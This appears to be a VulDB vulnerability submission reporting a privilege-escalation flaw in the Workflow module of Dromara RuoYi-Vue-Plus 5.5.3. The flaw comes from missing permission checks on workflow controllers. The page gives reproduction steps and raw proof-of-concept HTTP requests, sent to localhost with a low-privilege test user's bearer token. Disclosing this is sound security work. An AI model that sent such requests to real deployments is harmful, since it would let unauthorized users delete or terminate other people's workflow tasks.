| タイトル | Dromara RuoYi-Vue-Plus 5.5.3 Privilege Escalation |
|---|
| 説明 | Dromara RuoYi-Vue-Plus v5.5.3 is vulnerable to Privilege Escalation in the Workflow module. The application fails to properly enforce object-level and function-level authorization checks on critical interfaces. Authenticated users with low privileges can bypass access controls to execute sensitive operations, such as deleting process instances, terminating tasks, and modifying task assignees, by directly invoking the API endpoints (e.g., /workflow/instance/deleteByInstanceIds). This issue stems from missing @SaCheckPermission annotations in FlwDefinitionController, FlwTaskController, and FlwInstanceController.
Vulnerability Type: CWE-862: Missing Authorization
code:https://gitee.com/dromara/RuoYi-Vue-Plus
http://github.com/dromara/RuoYi-Vue-Plus
Analysis: The SaServletFilter in SecurityConfig.java only verifies login status but does not enforce specific permissions for the Workflow module. Critical controllers (FlwDefinitionController, FlwTaskController, FlwInstanceController) lack the @SaCheckPermission annotation on sensitive write operations.
PoC (HTTP Request):
Reproduction Steps:
Log in as a low-privileged user (no workflow admin rights) and obtain an authorization token.
Send a DELETE request to /workflow/instance/deleteByInstanceIds/ with the ID of a process instance created by an administrator.
The server responds with 200 OK, and the target instance is deleted, confirming the privilege escalation.
GET /workflow/definition/list?pageNum=1&pageSize=10 HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOiJzeXNfdXNlcjo0Iiwicm5TdHIiOiJ2TVpVY2ZiYXlVM3g0THF4SVk3N2REUG5Xb244N0EyWCIsImNsaWVudGlkIjoiZTVjZDdlNDg5MWJmOTVkMWQxOTIwNmNlMjRhN2IzMmUiLCJ0ZW5hbnRJZCI6IjAwMDAwMCIsInVzZXJJZCI6NCwidXNlck5hbWUiOiJ0ZXN0MSIsImRlcHRJZCI6MTAyLCJkZXB0TmFtZSI6IumVv-aymeWIhuWFrOWPuCIsImRlcHRDYXRlZ29yeSI6IiJ9.OUatQncTnbJHil5EqkbXgYRpj2PFjG02gkDxOdDHsNM
Connection: keep-alive
Content-Language: zh_CN
Cookie: PUBLICCMS_ANALYTICS_ID=db35d5f9-5a97-4e31-9f4b-e4d65d94cb13; PUBLICCMS_ADMIN=1_967744fc-9de7-4e7e-a32c-78e26cca27bb
Host: localhost:8080
Referer: http://localhost/demo/tree
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
clientid: e5cd7e4891bf95d1d19206ce24a7b32e
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
POST /workflow/task/terminationTask HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOiJzeXNfdXNlcjo0Iiwicm5TdHIiOiJ2TVpVY2ZiYXlVM3g0THF4SVk3N2REUG5Xb244N0EyWCIsImNsaWVudGlkIjoiZTVjZDdlNDg5MWJmOTVkMWQxOTIwNmNlMjRhN2IzMmUiLCJ0ZW5hbnRJZCI6IjAwMDAwMCIsInVzZXJJZCI6NCwidXNlck5hbWUiOiJ0ZXN0MSIsImRlcHRJZCI6MTAyLCJkZXB0TmFtZSI6IumVv-aymeWIhuWFrOWPuCIsImRlcHRDYXRlZ29yeSI6IiJ9.OUatQncTnbJHil5EqkbXgYRpj2PFjG02gkDxOdDHsNM
Connection: keep-alive
Content-Language: zh_CN
Cookie: PUBLICCMS_ANALYTICS_ID=db35d5f9-5a97-4e31-9f4b-e4d65d94cb13; PUBLICCMS_ADMIN=1_967744fc-9de7-4e7e-a32c-78e26cca27bb
Host: localhost:8080
Referer: http://localhost/demo/tree
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
clientid: e5cd7e4891bf95d1d19206ce24a7b32e
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Content-Type: application/json
{"taskId":1,"comment":"poc"}
|
|---|
| ユーザー | feng123123 (UID 95215) |
|---|
| 送信 | 2026年02月06日 10:30 (4 月 ago) |
|---|
| モデレーション | 2026年02月19日 18:13 (13 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 346944 [Dromara RuoYi-Vue-Plus 迄 5.5.3 Workflow deleteByInstanceIds SaServletFilter 特権昇格] |
|---|
| ポイント | 17 |
|---|